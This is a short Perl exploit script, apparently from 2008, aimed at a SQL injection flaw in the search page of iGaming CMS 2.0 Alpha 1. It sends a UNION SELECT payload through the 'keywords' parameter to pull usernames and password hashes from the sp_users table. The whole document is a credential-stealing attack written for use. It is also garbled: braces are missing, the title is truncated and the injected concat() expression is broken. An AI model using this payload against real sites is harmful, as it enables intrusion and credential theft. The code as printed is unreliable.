iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploi
# -----------------------------------------------------
# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit
# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
# On 16/10/2008
# http://www.igamingcms.com/iGaming_2_Alpha.zip
# -----------------------------------------------------
use strict;
use LWP::UserAgent;
my ($host,$id) = @ARGV;
usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;
my $etc = "' union select 1,concat(0x616E6172636879,".
",4,5 from sp_users where id=$id#";
my @search = ($etc,'all',0,'Search','search_games');
my @split = undef;
my $http = new LWP::UserAgent;
my $post = $http->post($host.'/search.php',
keywords => $search[0],
platform => $search[1],
exact => $search[2],
submit => $search[3],
do => $search[4]
if($post->as_string =~ /anarchy(.+?)anarchy/)
@split = split(':',$1);
print "Username: $split[0]\r\n";
print "Password: $split[1]\r\n";
print "Exploit Failed!\r\n";
sub usage
print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";
print "Usage: perl $0 http://[host] [user_id]\r\n";
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